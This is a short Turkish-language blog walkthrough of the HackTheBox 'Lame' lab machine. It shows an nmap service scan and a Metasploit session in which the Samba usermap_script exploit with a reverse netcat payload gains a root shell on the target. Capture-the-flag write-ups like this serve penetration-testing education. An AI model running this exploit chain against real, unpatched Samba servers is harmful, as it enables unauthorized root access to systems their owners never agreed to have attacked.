Post

Lame

Posted
Preview Image
By Umut Sağlam 2 min read

Lame, root erişimi elde etmek için yalnızca bir istismar gerektiren başlangıç seviyesinde bir makinedir.

Lame

nmap taramasıyla başlıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.10.3 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 04:48 EDT
Nmap scan report for 10.10.10.3 (10.10.10.3)
Host is up (0.076s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.05 seconds

ftp ve smb servisleri çalışıyor. vsftpd 2.3.4 versiyonunda zafiyetler var fakat bu makine için kullanılamıyor. Bu yüzden hedefim smb servisi.

exploit/multi/samba/usermap_script metasploit modulünü kullanıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Display the Framework log using the log command, learn 
more with help log
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'



       =[ metasploit v6.4.0-dev                           ]
+ -- --=[ 2404 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.4
lhost => 10.10.14.4
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.10.10.3:59143) at 2024-03-29 04:54:12 -0400

whoami
root

İşlem bu kadar :)

fsoc

HackTheBox
Easy Linux
This post is licensed under CC BY 4.0 by the author.